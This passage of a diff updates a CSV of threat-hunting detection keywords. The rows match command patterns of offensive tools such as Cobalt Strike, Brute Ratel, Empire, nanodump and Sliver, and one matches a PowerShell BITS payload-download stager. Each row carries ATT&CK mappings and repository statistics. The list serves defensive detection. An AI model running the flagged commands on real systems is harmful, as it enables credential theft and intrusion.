SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" "impersonate *\*","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "import boko*","offensive_tool_keyword","boko","boko.py is an application scanner for macOS that searches for and identifies potential dylib hijacking and weak dylib vulnerabilities for application executables as well as scripts an application may use that have the potential to be backdoored","T1195 - T1078 - T1079 - T1574","TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/bashexplode/boko","1","0","N/A","N/A","1","59","12","2021-09-28T22:36:01Z","2020-05-22T21:46:33Z" -"inceptor*dotnet*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","0","N/A","N/A","10","1356","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" +"inceptor*dotnet*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense 
Evasion","https://github.com/klezVirus/inceptor","1","0","N/A","N/A","10","1357","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" "kerberoast *","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "koh exit*","offensive_tool_keyword","cobaltstrike","Koh is a C# and Beacon Object File (BOF) toolset that allows for the capture of user credential material via purposeful token/logon session leakage.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/GhostPack/Koh","1","0","N/A","10","10","447","59","2022-07-13T23:41:38Z","2022-07-07T17:14:09Z" "koh 
list*","offensive_tool_keyword","cobaltstrike","Koh is a C# and Beacon Object File (BOF) toolset that allows for the capture of user credential material via purposeful token/logon session leakage.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/GhostPack/Koh","1","0","N/A","10","10","447","59","2022-07-13T23:41:38Z","2022-07-07T17:14:09Z" 
@@ -18727,37 +18916,38 @@ "load *.cna","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "make_token *","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "make_token *","offensive_tool_keyword","cobaltstrike","A basic implementation of abusing the SeBackupPrivilege via Remote Registry dumping to dump the remote SAM SECURITY AND SYSTEM 
hives.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/m57/cobaltstrike_bofs","1","0","N/A","10","10","153","25","2022-07-23T20:37:52Z","2020-07-30T22:36:51Z" -"masscan *","offensive_tool_keyword","masscan","TCP port scanner. spews SYN packets asynchronously. scanning entire Internet in under 5 minutes.","T1046","TA0007","N/A","N/A","Reconnaissance","https://github.com/robertdavidgraham/masscan","1","0","N/A","N/A","10","21683","2981","2023-08-09T13:28:54Z","2013-07-28T05:35:33Z" +"masscan *","offensive_tool_keyword","masscan","TCP port scanner. spews SYN packets asynchronously. 
scanning entire Internet in under 5 minutes.","T1046","TA0007","N/A","N/A","Reconnaissance","https://github.com/robertdavidgraham/masscan","1","0","N/A","N/A","10","21688","2980","2023-08-09T13:28:54Z","2013-07-28T05:35:33Z" "memdump *","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "memex /*.exe*","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "memhunt *","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "na.exe *","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - 
T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","0","N/A","10","10","234","35","2023-10-01T08:09:18Z","2022-10-08T19:02:58Z" "nanodump*","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","1467","208","2023-09-04T01:25:27Z","2021-11-10T18:28:15Z" "needle_sift *","offensive_tool_keyword","cobaltstrike","Strstr with user-supplied needle and filename as a BOF.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EspressoCake/Needle_Sift_BOF","1","0","N/A","10","10","30","7","2021-09-27T22:57:33Z","2021-09-27T20:13:10Z" -"net.recon *","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - 
T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","0","N/A","N/A","10","14623","1372","2023-09-18T15:43:34Z","2018-01-07T15:30:41Z" +"net.recon *","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","0","N/A","N/A","10","14627","1373","2023-09-18T15:43:34Z","2018-01-07T15:30:41Z" "nikto -*","offensive_tool_keyword","nikto","Nikto web server scanner","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/sullo/nikto","1","1","N/A","N/A","10","7136","1096","2023-09-18T14:44:28Z","2012-11-24T04:24:29Z" -"nimplant","offensive_tool_keyword","nimplant","user agent default field - A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","641","85","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" -"nimplant *","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","0","N/A","10","10","641","85","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" +"nimplant","offensive_tool_keyword","nimplant","user agent default field - A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","643","86","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" +"nimplant *","offensive_tool_keyword","nimplant","A 
light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","0","N/A","10","10","643","86","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" "noclient-3.*","offensive_tool_keyword","EQGRP tools","Equation Group hack tool leaked by ShadowBrokers- file noclient CNC server for NOPEN*","T1053 - T1064 - T1059 - T1218","TA0002 - TA0007","N/A","N/A","Shell spawning","https://github.com/x0rz/EQGRP/blob/master/Linux/bin/noclient-3.3.2.3-linux-i386","1","0","N/A","N/A","10","4011","2166","2017-05-24T21:12:59Z","2017-04-08T14:03:59Z" "onex install *","offensive_tool_keyword","onex","Onex is a package manager for hacker's. Onex manage more than 400+ hacking tools that can be installed on single click","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/rajkumardusad/onex","1","0","N/A","N/A","","N/A","","","" "polenum *:*","offensive_tool_keyword","polenum","Uses Impacket Library to get the password policy from a windows machine","T1012 - T1596","TA0009 - TA0007","N/A","N/A","Discovery","https://salsa.debian.org/pkg-security-team/polenum","1","0","N/A","8","10","N/A","N/A","N/A","N/A" -"posh -u *","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" -"powerpick *","offensive_tool_keyword","havoc","Havoc is a 
modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","0","N/A","10","10","4893","746","2023-10-03T23:32:31Z","2022-09-11T13:21:16Z" +"posh -u *","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"powerpick *","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","0","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" "powershell.exe -nop -c ""start-job *Import-Module BitsTransfer*$env:temp*GetRandomFileName()*Start-BitsTransfer -Source 'http*Remove-Item*Receive-Job*","offensive_tool_keyword","powershell","deployment of a payload through a PowerShell stager using bits to 
download","T1197","TA0009","N/A","N/A","Collection","https://thedfirreport.com/2023/09/25/from-screenconnect-to-hive-ransomware-in-61-hours/","1","0","N/A","8","10","N/A","N/A","N/A","N/A" "ps_ex *","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" -"psenum *","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"psenum *","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "psgrep *","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" -"psinject","offensive_tool_keyword","empire","Empire commands. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. 
While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1155","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"pupysh","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","7841","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"psinject","offensive_tool_keyword","empire","Empire commands. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1155","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - 
HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"pupysh","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" "python3 start_campaign.py","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1024 - T1071 - T1029 - T1569","TA0002 - TA0003 - TA0040","N/A","N/A","C2","https://github.com/ahmedkhlief/Ninja","1","0","N/A","10","10","720","166","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z" -"raw_keylogger *","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1056-001 - T1056-002 - T1056-003 - T1056-004 - T1056-005 - T1003 - T1113 - T1213","TA0006 - TA0009","N/A","N/A","Collection - Credential Access - Exfiltration","https://github.com/trustedsec/SliverKeylogger","1","0","N/A","N/A","2","126","37","2023-09-22T19:39:04Z","2022-06-17T19:32:53Z" -"RedGuard -*","offensive_tool_keyword","RedGuard","RedGuard is a C2 front flow control tool.Can avoid Blue Teams.AVs.EDRs check.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - 